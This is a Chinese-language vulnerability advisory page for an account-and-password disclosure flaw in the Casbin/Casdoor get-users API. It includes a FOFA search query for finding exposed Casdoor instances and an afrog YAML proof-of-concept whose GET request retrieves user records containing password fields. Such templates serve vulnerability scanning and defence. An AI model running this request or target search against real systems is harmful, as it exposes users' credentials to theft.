casbin-get-users-account-password-disclosure: Casbin get-users 账号密码泄漏漏洞

日期: 2025-09-01 | 影响软件: casbin-get-users | POC: 已公开

漏洞描述

Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息 fofa-query: title="Casdoor"

PoC代码[已公开]

id: casbin-get-users-account-password-disclosure

info:
  name: Casbin get-users 账号密码泄漏漏洞
  author: daffainfo
  severity: high
  verified: true
  description: |
    Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息
    fofa-query: title="Casdoor"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    

rules:
  r0:
    request:
      method: GET
      path: /api/get-users?p=123&pageSize=123
    expression: response.status == 200 && response.body.bcontains(b'"name":') && response.body.bcontains(b'"password":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/casbin-get-users-account-password-disclosure.yaml

相关漏洞推荐